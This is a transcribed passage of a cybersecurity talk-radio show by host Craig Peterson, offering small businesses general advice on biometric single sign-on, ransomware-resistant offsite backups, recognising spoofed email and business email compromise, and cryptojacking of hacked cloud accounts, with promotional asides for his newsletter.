You also want to make sure that you implement what's called a passwordless user agent, and this is just so wholly effective. If they cannot get into your account, what could possibly go wrong? But one of the ways to not allow them into the account is to use [00:17:41] biometrics. We use something called Duo, and we have that tied into the single sign-on, and the Duo single sign-on works great, because what it does now is, I go to a site, I put in my username, and it pulls up a special splash page that is running on one of our servers. That, again, asks me for my Duo username. [00:18:04] So I've got my username for the site, then my Duo username and my Duo password, single sign-on. And then it sends me, to an app on my smart device, a request saying, hey, are you trying to log into Microsoft? Or whatever it might be. And you can say yes or no, and it uses biometrics. [00:18:27] So those biometrics now are great because it says, oh, okay, I need a Face ID or I need a thumbprint, whatever it might be. That allows a generalized passwordless access. Okay. Passwordless, meaning no password. So those are some of the top things you can do when it comes to prevention. And if you use those, they're never going to be able to get at your data, because it's something you have along with something else. It works great. [00:19:02] And we like to do this. Some customers don't like to go through those hoops of the single sign-on and using Duo and making that all work right, where we're fine with it. We've got to keep ourselves at least as secure as the DoD regulations require, unlike almost anybody else in industry. I'm not going to brag about it, [00:19:26] but some of our clients don't like to meet the tightest of controls, and so sometimes they don't. I hate to say that, but they just don't, and it's a fine line between getting your work done and being secure, but I think there are some compromises that can be readily made.
We're going to talk next about saving your data from ransomware, and the newest ransomware. [00:19:53] We're going to talk about the third generation that's out there right now. Ransomware, it's getting crazy, let me tell ya, and what it's doing to us and what you can do. What is a good backup? That has changed over the last 12 months. It's changed a lot. I used to preach 3-2-1. There's a new sheriff in town. [00:20:15] Stick around. craigpeterson.com. [00:20:19] 3-2-1, that used to be the standard, the gold standard for backing up. It is no longer the case, with now the third generation of ransomware. You should be doing something even better, and we'll talk about it now. [00:20:36] We're doing this as a simulcast here. It's on YouTube. It is also on Rumble. [00:20:43] It's on my website at craigpeterson.com, because we're going through the things that you can do, particularly if you're a business, to stop the Russian invasion, because, as we've been warned again and again, the Russians are after us and our data. So if you missed part of what we're talking about today, or [00:21:07] last week's show, make sure you send me an email: me@craigpeterson.com. This is the information you need if you are responsible in any way for computers. That means in your home, right? Certainly in businesses, because what I'm trying to do is help and save those small businesses that just can't afford to have full-time, [00:21:31] true cybersecurity personnel on site. So that's what the whole fractional chief information security officer thing is about, because you just can't possibly afford it. And believe me, that guy that comes in to fix your computers is no cybersecurity expert. These people that are attacking are full-time cybersecurity experts, and they're coming from every country in the world, including coming from the U.S. [00:22:01] We just had more arrests last week. So let's talk about ransomware correctly. Ransomware, very big problem. Been around a long time.
The first version of ransomware was software that got onto your computer through some mechanism, and then you had that red screen. We've all seen that red screen, and it says, hey, pay up, buddy. [00:22:23] It says here you need to send so many Bitcoin, or a fraction of a Bitcoin, or so many dollars' worth of Bitcoin, to this Bitcoin wallet. And if you need any help, you can send email here or do a live chat. They're very sophisticated. We should talk about it some more at some point. That was one generation. [00:22:45] Generation two was: not everybody was paying the ransoms. So what did they do at that point? They said, let me see if we can ransom the data by encrypting it and having them pay us to get it back. 50% of the time you got all your data back. Okay. Not very often. Not often enough, that's for sure. [00:23:05] Or what we could do is, let's steal some of their intellectual property. Let's steal some of their data, their Social Security numbers, their bank account numbers, et cetera. They're in an Excel spreadsheet at their company. And then, if they don't pay that first ransom, we'll tell them if they don't pay up, we'll release their information. [00:23:26] Sometimes you'll pay that first ransom and then they will hold you ransom a second time, pretending to be a different group of cyber terrorists. Okay. Number three, round three, is what we're seeing right now. And this is what's coming from Russia, as near as everything we can tell. And that is, they are erasing our machines. [00:23:48] Totally erasing them, in pretty sophisticated ways of erasing it as well, so that it sinks in; really, it's impossible to recover. It's sophisticated in that it doesn't delete some key registry entries until right at the very end, and then reboots the computer. And of course, there's no [00:24:11] computer left to reboot, right? It's lost everything off of that hard drive or SSD, whatever your boot device is.
So let's talk about the best ways here to do some of this backup and saving your data from ransomware. Now, you need to use offsite, disconnected backups, no question about it. So let's talk about what's been happening. [00:24:34] Hospitals, businesses, police departments, schools, they've all been hit, right? And these ransomware attacks are usually started by a person clicking a link in an email. Now, this is a poisoned link, most of the time. It used to be a little bit more where it was a Word document, an Excel document that had something nasty inside. Microsoft, as I've said many times, has truly pulled up their socks. [00:25:02] Okay. So it doesn't happen as much as it used to. Plus, with Microsoft Defender turned on in your Windows operating system, you're going to be a little bit safer. Next step: a program tries to run. Okay. And it effectively denies access to all of that data, because it's encrypted it. And then usually what it does, so that your computer still works, [00:25:26] is it encrypts all of your, like, your Word docs, your Excel docs, your databases, right? All the stuff that matters. And once they've got all of that encrypted, you can't really access it. Yeah, the file's there, but it looks like trash now. There's a new disturbing trend that has really developed over the last few months. [00:25:48] So in addition to encrypting your PC, it can now encrypt an entire network and all mounted drives, even drives that are mirroring cloud services. Remember this, everybody, this is really a big deal, because what will happen here is, if you have, let's say you've got an old drive, a G: drive or some drive mounted off of your network, [00:26:14] you have access to it from your computer, right? Yeah. You click on that drive, and now you're in there, and on the Windows side, Unix and Macs are a little different but the same general idea, you have access to it; you have write access to it.
So what they'll do is any mounted drive, like those network drives, is going to get encrypted, but the same thing is true [00:26:36] if you are attaching a USB drive to your computer. So that USB drive, now, that has your backup on it, gets encrypted. So if your network is being used to back up, and if you have a thumb drive, a USB drive, it's not really a thumb drive, right? It's an external drive, but connected by USB, hooked up, [00:27:02] and that's where your backup lives, your backup is gone, because you have lost it. And there have been some pieces of software that have done that for a while. Yeah. When they can encrypt your network drive, it is really going after a whole bunch of people, because everyone that's using that network drive is now affected, and it is absolutely [00:27:27] devastating. So the best way to do this is, obviously you do a bit of a local backup. We will usually put a server at the client's site that is used as a backup destination. Okay. So that server's the destination; all of the stuff gets backed up there. It's encrypted. It's not on the network per se. It's using a special encrypted protocol between each machine and the backup server. And then that backup server's data gets pushed offsite. Some of our clients, we even go so far as to push it [00:28:20] to a tape drive, which is really important too, because now you have something physical that is, by the way, encrypted, that cannot be accessed by the attacker. It's offsite. So we have our own data center. We run it, we manage it, no one else has access to it; it is ours. And we push all of those backups offsite to our data center, which gives us another advantage. If a machine crashes badly, right, the hard disk fails, heaven forbid they get ransomware, we've never had that happen to one of our clients. [00:28:46] We've had it happen prior to them becoming clients. It is that we can now restore
that machine, either virtually in the cloud, or we can restore it right onto a piece of hardware and have them up and running in four hours. It can really be that fast, but it's obviously more expensive than some [00:29:08] are looking to pay. All right, stick around. We've got more to talk about when we come back. And what are the Russians doing? How can you protect your small business? If you're a one-man, one-woman operation, believe it, you've got to do this as well, or you could lose everything. In fact, I think our small guys have even more to lose. craigpeterson.com. [00:29:32] Backups are important, and we're going to talk about the different types of backups right now, what you should be doing, whether you're a one-person little business or you are a multinational. Obviously, scale matters. [00:29:47] Protecting your data is one of the most important things you can possibly do. [00:29:53] I have clients who had their entire operating account emptied out, completely emptied. It's just amazing. I've had people pay a lot of money to hackers to try and get data back. And I go back to this one lady over in Eastern Europe who built a company out of $45 million by herself. And of course, you probably heard about the Shark Tank people, right? [00:30:23] Barbara Corcoran, how she almost lost $400,000 to a hacker. In fact, the money was on its way when she noticed what was going on and was able to stop it. So thank goodness she was able to stop it. But she was aware of these problems, was looking for the potential, and was able to catch it. How many of us are paying that much attention? [00:30:50] And now, one of the things you can do that will usually kind of protect you from some of the worst outcomes when it comes to ransomware is to back up. And I know everybody says, yeah, I'm backing up. It's really rare when we go in and we find a company has been backing up properly. It even happens to us sometimes.
[00:31:15] We put the backup regimen in place, and things seem to be going well, but then when you need the backup, oh my gosh. We just had this happen a couple of weeks ago, actually this last week. This is what happened. We have something called an FMC, which is a controller from Cisco that actually controls firewalls in our customers' locations. [00:31:42] This is a big machine. It monitors stuff. It's tied into this ISE server, which is looking for nastiness and for bad guys trying to break in, right? It's intrusion detection and prevention, and tying it into this massive network of a billion data points a day that Cisco manages. Okay. It's absolutely huge. [00:32:05] And we're running it in a virtual machine network. So we have two big blade chassis full of blades, and each blade is a computer. So it has multiple CPUs and has a whole bunch of memory. It also has storage in there, and we're using something that VMware calls vSAN. So it's a little virtual storage area network [00:32:32] that's located inside this chassis, and there are multiple copies of everything. So if a storage unit fails, you're still okay. Everything stays up; it keeps running. And we have it set up so that there's redundancy upon redundancy. One of the redundancies was to back it up to a file server that we have that's running ZFS, which is phenomenal. [00:32:56] Let me tell you, it is the best file system out there. I've never, ever had a problem with it. It's just crazy. I can send you more information if you're ever interested; just email me@craigpeterson.com anytime. I'd be glad to send you the open-source information, whatever you need. But what had happened is, [00:33:13] somehow the boot disk of that FMC, that firewall controller, had been corrupted. So we thought, oh, okay, no problem. Let's look at our backups. Yeah, it hadn't backed up since October 2019. Yeah, and we didn't know. It had been silently failing.
Obviously, we're putting stuff in place to stop that from ever happening again. [00:33:43] So we are monitoring the backups. That network of disks that was making up that storage area network that had the redundancy failed because the machine itself somehow corrupted its file system, an ext4 file system, which isn't supposed to be corruptible, but the journal was messed up, and it was, man, what a headache. [00:34:07] And so they thought, okay, you're going to have to reinstall. And we were sitting there saying, oh, you're kidding me. Reinstalling this FMC controller means we've got to configure our clients' firewalls that are being controlled from this FMC, all of their networks, all of their devices. We had to put it all out. [00:34:23] This is going to take a couple of weeks. So, because I've been doing this for so long, I was able to boot up a Knoppix disk and mount the file system and go in manually underneath the whole FMC, this whole firewall controller, and make repairs to it. Got it repaired, and then got it back online. So thank goodness for that. [00:34:49] It happens to the best of us, but I have to say I have never had a new client where they had good backups. Ever. Okay. And that should tell you something. So if you are a business, a small business, whatever it might be, check your backups. Double-check them. Now, when we're running backups, we do a couple of things. [00:35:14] We go ahead and make sure the backup is good. So remember I mentioned that we have a backup server that sits onsite. Usually, it depends on the size of the client, but it sits onsite at the client's site. So it will perform the backup and then try an actual restore of that backup to make sure it's good. [00:35:35] And we can even, for a client, depending on what they want, at a higher level, if a machine goes down, let's say it catches fire, or the disk explodes in it, or it completely fails, we can actually bring that machine online inside our backup server for the customer.
Yeah, how's that for fancy? And bring it back online in just a matter of minutes instead of days or weeks. [00:36:04] So that's true too if that machine had been ransomed, had its data erased, whatever might've happened to it. We can restore it. Now, we've never had to, knock on wood, except when there was a physical problem with the machine, and, starting from scratch on that machine, we had the new machine online in four hours or less. [00:36:28] And it's really cool the way it works. If you like this stuff, man, it is great. Okay. Protecting your data. I'm rambling a little bit here. You need an archival service. There are companies out there like Iron Mountain. You can, at your local bank, depending on the bank, it ain't like it used to be, get a box, right? [00:36:50] A special box in the vault that you put the tapes and other things in. Nowadays there are cloud options, virtual tape backup options, which is a lot of what we use and we do. Okay. We also use straight cloud at the very bottom end. Again, it's not located on the network. It's up in the cloud. It's double encrypted. [00:37:13] It's absolutely the way to do it. Now, if you're going to have a backup, and if you want that backup to be secure, it must not be accessible to the attacker. You've got to put some literal air space between your backups and the cyber criminals. It's called an air gap. So there's no way for them to get to it. [00:37:37] Okay. Now, I want you to consider seriously using tape, these LTO, these linear tape drives. They've been around for a long time, but their cartridges you can pull in and out, and they're huge. They're physically small, but they can hold terabytes' worth of data. They're absolutely amazing. There are some great disk-based backup systems, which is what we do. [00:38:02] Some of them have been around a long time, and they can be quite reasonably priced. All right.
So it's something for you to consider, but you've got to have at least that air gap in order to make sure that you're going to be protected. What should you be looking for in a backup system? This is called 3-2-1-1-0, which means maintain at least three copies of your data, store the backups on two different media, [00:38:31] store at least one of the copies at an offsite location, store at least one of the copies offline, and be sure to have verified backups without errors. Okay. Does that sound a little complicated? 3-2-1-1-0 is what it's called. It used to be 3-2-1. Now it's 3-2-1-1-0. Karen put together a special report on this based on our research, [00:38:57] and I can share that with you. Absolutely free. Hey guys, if you want it, you've got it. But you've got to ask me; just email me, me@craigpeterson.com. This is absolutely essential if you're a small business, a tiny business, to do it this way. Let me tell you, okay, this is just huge. Physical backups should be stored offsite. [00:39:19] I mentioned the bank vault. A lot of people just go ahead and take them home with them. That might be a disk. It might be a tape. It can be a little bit complicated to do. And I've picked up customers that thought they were backing up. They were using a USB drive. They were putting it in dutifully every Monday. [00:39:41] And then every Wednesday, what happened? Every Wednesday they bring in Wednesday's disk, and then they bring that disk home, and then Thursday, they bring in the Thursday disk. And none of them had been working. Okay. So be very careful. All of your backups should be encrypted. We encrypt it at the customer site, and then we re-encrypt it when we bring it over to us. [00:40:06] Okay. Keys are essential, particularly if you're using a cloud-based backup. Don't use the same keys across multiple backups. Very important there. You should have some good procedures that are well documented. Test, test your restores, because very frequently
we find they don't work. In fact, that's the number one problem, right? [00:40:30] If they had just tried to restore, even once, from their backup, they would've known they had problems. And get those backups scheduled on a regular schedule. Okay. So there's a lot more, offline backups and more, that we can talk about another time, but this is important. If you want any help, send me an email, just put "backups" in the subject line. [00:40:55] I'll send you some stuff. Email me, me@craigpeterson.com. Now I am more than glad to help pretty much anybody out there. I'm not going to help, what's his name, Vladimir Putin. But anybody else I'll help, but you've got to reach out. Okay. You listen here, and I know some of this stuff is over some of our heads, some of your heads. You're the best and brightest. [00:41:20] That's why you're listening, and I'll help you out. I'll send you some information that's going to get you on the right track. Me, me@craigpeterson.com. That's Craig Peterson, S-O-N. Have a great day. [00:41:35] We just got an email this week from a customer, and they're saying, oh no, my email has been hacked. What does that mean? Was it really hacked? We're going to talk right now about email spoofing, which is a very big deal. [00:41:51] Email spoofing has been a problem for a long time, really since the 1970s. I remember when I got my first spoofed email back in the eighties, and it was really a little bit confusing. [00:42:05] I went into it in more detail, of course, being a very technical kind of guy, and looked behind the curtains, figured out what was going on, just shook my head. I marveled at some people. Why would you do this sort of thing? The whole idea behind email spoofing is for you to receive an email that looks like it's from someone that it's not. Now, you've all seen examples of this. [00:42:30] Everybody has.
And those emails that are supposedly from the bank, or maybe from Amazon or some other type of business or family friend, this is part of what we call social engineering, where the bad guys are using a little bit about what they know about you, or maybe another person, in order to, frankly, fool you. [00:42:54] That's what spoofing really is. There were a lot of email accounts that were hacked over the last, what, 30, 40 years. And you might remember this: people sending out an email saying, oh, my account got hacked, because you just got emails. Back in the day, what people were trying to do is break into people's email accounts, and then the bad guys, after having broken in, now knew everybody that was in the contact list from the account that was just broken into. [00:43:29] Now they know, hey, listen, this person sends an email, maybe I can just pretend I'm them. These days the same thing still happens. But now typically what you're seeing is a more directed attack. So a person might even look in that email account that they've broken into and poke around a little bit and find out, oh, okay, [00:43:52] so this person's account I just broke into is a purchasing manager at a big company. So then they take the next step, or maybe the step after that, and try and figure out, okay, so now what do I do? Oh, okay. So really what I can do now is send fake purchase orders or send fake requests for money. I've seen in the past, with clients that we've picked up because the email was acting strangely, where a bad guy went ahead, found [00:44:25] invoices that had been sent out by the purchasing person, and then sent the invoices out and changed the pay-to information on the invoice. So they took the PDFs of the invoices that they found on the file server, went in and changed them, changed the account that they wanted the funds ACH'd into. And once they had that happen, they just sent the invoice out again saying overdue.
[00:44:54] Off it goes in the email, and the company receives it and says, oh okay, I need to pay this invoice now. Sometimes they marked them overdue. Sometimes they didn't mark them overdue. I've seen both cases. And now the money gets sent off, and that invoice gets paid, and then it gets paid to the wrong person. [00:45:13] Or maybe they go ahead and they don't send the invoice out, but they just send a little notification saying, hey, our account has changed. Make sure you direct all future payments to this account instead. Now you might be thinking, wait a second here. Now they send this email out. It's going to go into a bank account. [00:45:33] I can recover the money. Well, no, you can't. Because what they're doing is they are using mules. Now you've heard of mules before. You might've even seen that recent Clint Eastwood movie, I think it was called. But typically when we think of mules as people, we're thinking about people who are running drugs. Well, in this case, the bad guys use mules in order to move money around. [00:45:59] And now sometimes the people know what they're doing. The FBI has had some really great arrests of some people who were doing this, particularly out in California. Some of them claimed, yeah, I didn't know what was happening. It was just somebody asked me to send money. It's like the Nigerian scam, where in the Nigerian scam they say, hey, I'm a Nigerian prince, you've heard of these things before, and I need to get my money out of the country. I need a place to put it. And so if you have a US account, I'm going to transfer money into it. You can keep a thousand dollars of that 5,000 I'm going to wire in, just as a fee. Thanks for doing this. This is so important and it's such a hurry, and I'm going to send you the money. [00:46:46] What they'll often do is send you a money order. It could be a bank check, could be a lot of things, and then you go ahead and you cash it, and oh, okay, it cashes just fine.
And then you wire the $4,000 off to the bad guy. The bad guy gets the money and is off and running. In the meantime, your bank is trying to clear that bank check or that money order, [00:47:14] and they find out that there is no money there, because frankly, what might've happened? This is one I've seen. I'm telling you about a story where we helped to solve this problem, but they'd taken out a real money order from a bank, and then they made copies of it. Basically, they just forged it. And so they forged a hundred copies of it. [00:47:36] So people thought they were getting a legitimate money order. And in some cases, the banks where the money order was being deposited did confirm it. They called up the source bank. Oh yeah, yeah, that's a legit money order. And then they all hit within a week or two. And now you are left holding the bag. [00:47:58] So that's one thing that happens. But typically with these mules, the money comes to them in that account. They are supposed to then take that money and put it in their PayPal account and send it off to the next one. And it might jump through two or three different people, and then it ends up overseas, and the bad guys have gotten so good at this and have the cooperation of some small countries, sometimes bigger countries, that they actually own [00:48:30] the bank overseas that the money ultimately gets transferred into. And of course there's no way to get the money back. It's a real problem. So with spoofing, they're trying to trick you into believing the email's from someone that you know or someone that you can trust, or, as I said, maybe a business partner of some sort. In most cases, it's some sort of a colleague, a vendor, or a trusted brand. [00:48:58] And so they exploit the trust that you have, and they ask you to do something or divulge information. They'll try and get you to do something. So there are more complex attacks,
like the ones that I just explained here, that are going after financial employees. There might be some, an accountant, a bookkeeper, or bill payer, and receivables, payables. [00:49:24] I've seen CFO attacks. But really, the spoofed email message looks legitimate on the surface. They'll use the legitimate logo of the company that they're trying to pretend that they're from. For instance, PayPal phishing attacks. They have a spoofed email sender, and in typical email clients, like you might be using, for instance, Microsoft Outlook, [00:49:48] the sender address is shown on the message, but most of the time nowadays the mail clients hide the actual email address, or if you just glance at it, it looks legit. You've seen those before, these forged email headers. Yeah, it gets to be a problem. Now we use some software from Cisco that we buy. [00:50:13] You have to buy, I think it's a thousand licenses at a time, but there are some others out there. Cisco, again, by far the best. And this software receives the email. So before it even ends up in the Exchange server or somewhere else online, that email goes through that Cisco server. They are comparing it to billions of other emails that they've seen, including, in real time, emails that are arriving [00:50:41] right now. And they'll look at the header of the email message. You can do that as well. With any email client, you can look at the header. Microsoft in Outlook calls it View Source. But if you look at the email header, you'll see Received headers that are in there. So it'll say "Received: from" and they'll give a name of a domain, and then you'll see another Received header and it'll give another name of a machine. [00:51:08] And it'll include the IP address, might be IPv4 or IPv6, and you can then follow it all the way through. So what'll happen is, partway through, you'll see it took a hop that is not legitimate. That's where it comes in.
Nowadays, if you have an email address for your business, man, a domain, you need to be publishing what are called SPF records. [00:51:37] And those SPF records are looked at, they're compared, to make sure that the email is properly signed and is from the correct sender. There are SPF records. There are others too that you should have in place, but you'll see that in the headers, if you're looking in the header. So it gets pretty complicated. [00:51:59] SPF, which is the Sender Policy Framework, is a security protocol standard. It's been around now for almost a decade. It's working in conjunction with what are called Domain-based Message Authentication, Reporting, and Conformance headers, DMARC headers, to stop malware and phishing attacks. And they are very good if you use them properly, but unfortunately, when I look, I would say it's still 95% of emails that are being sent by businesses are not using this email spoofing protection. [00:52:35] So have a look at that, and I can send you a couple of articles on it if you're interested. craigpeterson.com. [00:52:46] So we've established that email spoofing happens. What are the stats on this? And how can you further protect yourself from email spoofing, particularly if you're not the technical type controlling DNS records? That's what's up, right? [00:53:02] Everybody, Craig Peterson here, your cybersecurity strategist. And you're listening to News Radio WGAN AM 560 and 98.5 FM. Join me on the morning drive, Wednesday mornings at 7:34, of course in the AM. There's so much going on in the cybersecurity world. It affects all of us. Now, I think back to the good old days 40 years ago, where we weren't worried about a lot of this stuff, spoofing, et cetera. [00:53:36] But what we're talking about right now is 3.1 billion domain-spoofed emails sent every day. That's a huge thing. More than 90% of cyber attacks start with an email message.
Email spoofing and phishing have had a worldwide impact, costing probably $26 billion over the last five years. A couple of years ago, the FBI, this is 2019, [00:54:07] reported that about half a million cyber attacks were successful. 24% of them were email-based, and the average scam tricked users out of $75,000. Yeah. So it's no wonder so many people are concerned about their email and whether or not those pieces of email are really a problem for them, and then anybody else. [00:54:34] So a common attack that uses spoofing is CEO fraud, also known as business email compromise. So this is where the attacker is spoofing or modifying, pretending to be a certain person that they're not. They're impersonating an executive or owner, maybe, of a business. And it targets people in the financial, accounting, or accounts payable departments, or even the engineering department. [00:55:01] And that's what happened with one of our clients this week. They got a very interesting spoofed email. So even when you're smart and you're paying attention, you can be tricked. A Canadian city treasurer tricked into transferring a hundred grand from taxpayer funds. Mattel tricked into sending 3 million to an account in China. A bank in Belgium tricked into sending the attackers 70 million euro. [00:55:31] It happens, and I have seen it personally with many businesses out there. So how do you protect yourself from email spoofing? Now, even with email security in place, there are some malicious email messages that are still going to get through to the inboxes. Now, we're able to stop better than 96% of them, just based on our stats. [00:55:54] In fact, it's very rare that one gets through, but here are some things you can do and watch out for, whether you're an employee responsible for financial decisions, or maybe you're someone who is using personal email at work. Here are some tricks. So get your pencil ready. Number one, never click links to access a website
[00:56:19] where you're asked to log in. Always type the official URL into your browser and authenticate in the browser. In other words, if you get an email from your bank or someone else, and there's a link in there to click that says, hey, oh man, here are some real problems, you've got to respond right away, [00:56:42] don't do that. Go to paypal.com or your bank or your vendor's site. Just type it into your browser, even though you can hover over the email link and see what it is. Sometimes it can be perfectly legitimate and yet it looks weird. For instance, when I send out my emails that people subscribe to, right there on craigpeterson.com, the links are going to come from the people that handle my email lists for me, because I send out thousands of emails at a time to people that have asked to get those emails. [00:57:22] So I use a service, and the service is taking those links, modifying them somewhat, in fact dramatically, and using that to make sure the delivery happened, people are opening it, and that I'm not bothering you, so you can unsubscribe. Next step. You can, if you want to dig in more, look at the email headers. [00:57:45] Now, they're different for every email client. If you're using Outlook, you have to select the email, basically on the left-hand side. Okay. You're going to control-click on that email, and a menu will come up, and you'll see something that says View Source. So in the Outlook world, they hide it from you. [00:58:06] If you're using a Mac and Mac Mail, all you have to do is go up in the menu bar to View, Headers, and there it is. I have many times in the past just left that turned on, so I'm always seeing the headers. That reminds me to keep a look at those headers. So if you look in the header, [00:58:31] and if the email sender is, let me put it this way, if the person who is supposed to have sent it to you is doing headers properly, you're going to see
a Received-SPF section of the headers, and right in there you can look for a pass or fail in the response, and that'll tell you if it's legit. So in other words, let's use PayPal as an example. PayPal has these records that it publishes that say all of our emails are going to come from this server or that server. [00:59:04] And I do the same thing for my domains, and we do the same thing for our clients' domains. So it's something that you can really count on, if you're doing it right, this section of the headers. And that's why I was talking about it earlier. If you have an email that you're sending out from your domain and you don't have those proper headers in it, there's no way [00:59:31] to truly authenticate it. Now, I go a step further and I use GPG in order to sign most of my emails. Now, I don't do this for the trainings and other things, but direct personal emails from me will usually be cryptographically signed, so you can verify that it was me that sent it. Another thing you can do is copy and paste the text, the body of that email, into a search engine. [01:00:03] Of course, I recommend DuckDuckGo in most cases. And the chances are that, frankly, they've sent it to multiple people. That's why I was saying our Cisco-based email filter, that's what it does. It looks for common portions of the body for emails that are known to be bad. Be suspicious of email from official sources like the IRS. They're not going to be sending you email out of the blue. Most places aren't. Obviously, don't open attachments from people that you don't know, especially suspicious ones. Particularly, people will send PDFs that are infected. It's been a real problem. They'll send, of course, Word docs, Excel docs, et cetera, as well. [01:00:54] And the more of a sense of urgency or danger that's a part of the email, the more it should really get your suspicions up, frankly, because suggesting something bad is going to happen
if you don't act quickly, that kind of gets around part of your brain, and it's the fight or flight, right? Hey, I've got to take care of this. [01:01:17] I've got to take care of this right away. Ah, and maybe you do. So those are the main things that you can pay attention to in the emails. If you are a tech person and you're trying to figure this out, how can I make the emails safer for our company? You can always drop me an email as well. Me, me@craigpeterson.com. [01:01:43] I can send you to a couple of good sources. I'll have to put together a training as well on how to do this, but as an individual, at least from my standpoint, a lot of this is common sense. And unfortunately, the bad guys have made it so email is something we can no longer completely trust. Spoofing is a problem. [01:02:05] As I said, we just saw it again this week. Thank goodness it was all caught and stopped. The account was not hacked. It was just a spoofed email from an account outside the organization. craigpeterson.com. Stick around. [01:02:24] The value of crypto coins has been going down lately, quite a bit, across the board, not just Bitcoin. But the amount of crypto mining and cryptojacking going on, that hasn't gone down much at all. [01:02:48] Hi, I'm Craig Peterson, your cybersecurity strategist, and you're listening to News Radio WGAN AM 560 and FM 98.5. You can join me on the morning drive every Wednesday morning at 7:34. Matt and I go over some of the latest in news. You know about crypto coins, at least a little bit, right? [01:03:15] These are the things like Bitcoin and others that are ostensibly private, but in reality aren't that private. If you receive coins and you spend coins, you are probably trackable. And if you can't spend the cryptocurrencies, why even bother getting them in the first place? One of the big drivers behind the price of these cryptocurrencies has been criminal activity. [01:03:48] We've talked about that before.
Here's the problem we're seeing more and more nowadays. Even though the price of Bitcoin might go down 30%, which it has, and it's gone down in bigger chunks before, it does not mean that the bad guys don't want more of it. And what better way to mine cryptocurrency than to not have to pay for it? [01:04:15] So the bad guys have been doing something called cryptojacking. This is where criminals are using really ransomware-like tactics and poisoned websites to get your computer, even your smartphone, to mine cryptocurrencies for them. Now, mining a Bitcoin can cost as much in electric bills, in fact more in electric bills, [01:04:43] than you get from the value of the Bitcoin itself. So it's expensive for them to run it. Some countries like China have said, no, you're not doing it anymore, because they're using so much electricity. Here in the US we've even got crypto mining companies that are buying old power plants, coal-fired or otherwise, and are generating their own electricity there locally in order to be able to mine cryptocurrencies efficiently, effectively, so that they can make some profit from it. [01:05:18] It's really quite the world out there. Some people have complained about their smartphone getting really hot. Their battery only lasts maybe an hour, and it's supposed to last all day. Sometimes what's happened is your smartphone has been hijacked. It's been cryptojacked. So your smartphone, they're not designed to sit there and do heavy computing all day long [01:05:45] like a workstation is. Even your regular desktop computer probably isn't designed to be able to handle the day-long mining that has to happen. In fact, the most efficient way to do crypto mining, of course, is using specialized hardware, but that costs them money. So why not just cryptojack? All right. There are two primary ways [01:06:09] hackers have been getting victims' computers to secretly mine cryptocurrencies. One is to trick them into loading crypto mining code onto their computers.
So that's done through various types of phishing-like tactics. They get a legitimate-looking email that tricks people into clicking on a link, and the link runs code. [01:06:30] Now, what's interesting is, for cryptojacking, you don't even have to download a program in order to have your computer start mining cryptocurrencies for the bad guys. They can use your browser to run a crypto mining script, and it runs in the background as you work, right, using up electricity, using up the CPU on your computer. [01:06:58] They also will put it into ads. They'll put it on a website, and your browser goes ahead and runs the code beautifully. So they're really trying to maximize their returns. That's the basics of cryptojacking. What's been particularly bad lately has been the hackers breaking into cloud accounts and then using those accounts to mine cryptocurrency. One of the trainings that I had in my Wednesday Wisdoms has to do with password stuffing, and my Wednesday Wisdoms you can get by just subscribing to my email over there at craigpeterson.com. [01:07:44] But what happens here is they find your email address. They find your password on one of these hacks that has occurred, on the dark web. You weren't on the dark web, but your username or email address and password are there on the dark web. And then they just try it. So a big site like Amazon, or maybe it was your IBM, which also has cloud services, can be sitting there running along very well, having fun. [01:08:16] Life's good. And then they go ahead and try your email address and password to try and break in. Now, you know how I keep telling everybody, use a good password manager. And this week I actually changed my opinion on password managers. So you know that I really like the password manager that you can get from 1password.com. [01:08:44] It really is fantastic, particularly for businesses, various types of enterprises. 1password.com.
However, where I have changed is that some of these browsers nowadays, particularly, thinking about Firefox, Google Chrome, Safari, particularly if you're on a Mac, all have built-in password managers that are actually good. [01:09:09] Now, they check Have I Been Pwned, which is a site I've talked to you guys about for years, to make sure that your accounts are reasonably safe, that they're not being found on the dark web, and the new password that it came up with, or that you want to use, they check that as well, make sure it's not in use. So here's an example here. [01:09:32] This is a guy by the name of Chris. He lives out in Seattle, Washington, and he makes mobile apps for local publishers. Just this year, New Year's Day, he got an alert from Amazon Web Services. Now, Amazon Web Services, of course, cloud service. They've got some really nice stuff, starting with Lightsail and going up from there. I've used various services from them for, well, since they started offering the services, over very many years. And [01:10:04] they allow you to have a computer, and you can get whatever size computer you want to, or fraction of a computer you want to. He got this alert because it said that he owed more than $53,000 for a month's worth of hosting. Now, his typical Amazon bill is between a hundred and 150 bucks a month. My typical Amazon bill is now 50 to maybe $80 a month. [01:10:34] I cannot imagine getting a $53,000 bill from our friends at Amazon. So the poor guy was just totally freaking out, which is a very big deal. So I'm looking at an article from Insider that you can find at businessinsider.com. They were able to confirm that, yes, indeed, he got this $53,000 bill from Amazon, and yes, indeed, [01:11:00] it looks like his account had been hacked by cryptocurrency miners. So these guys can run up just incredibly large charges for the raw computing power they need to produce some of these digital cryptocurrencies, like Bitcoin. There are many others out there.
But this isn't new. This is happening all of the time. [01:11:23] Google reported late last year that 86% of account breaches on its Google Cloud Platform were used to perform cryptocurrency mining. So make sure you are using a good password manager that generates good passwords. And I have a special report on passwords. You can download it immediately when you sign up for [01:11:48] my email, my weekly email newsletter, at craigpeterson.com, and it tells you what to do, how to do it, what is a good password, what the thinking is, because it's changed on passwords. But do that, and use two-factor authentication, multi-factor authentication as well. And I talk about that in that special report too. [01:12:11] And visit me online. Sign up right now. craigpeterson.com. [01:12:17] We're moving closer and closer to completely automated cars, but we want to talk right now about car hacks, because there was an interesting one this week that has to do with Tesla. And we'll talk about some of the other hacks on cars. [01:12:33] Connected cars are coming our way in a very big way. [01:12:38] We just talked about the shutdown of 2G and 3G in our cars. Well, it wasn't really our cars, right? 2G, 3G, that was for our cell phones. That was years ago. Of course, now it's 4G LTE, 5G, even 10G is being used in the labs right now. It's hard to think about some of those older technologies, but they were being used, and they were being used by cars, primarily for the navigation features. [01:13:13] Some cars use these data links, if you will, that are really on the cell phone network in order to do remote things like remote start, for instance. I have a friend whose Subaru, of course, was using that. And now she's got to do an upgrade on her car because that 3G technology is going away, depending on the carrier, by the way. Some of it's going away sooner, [01:13:40] some of it's going away later, but it'll all be gone at the end of 2020. What are we looking at?
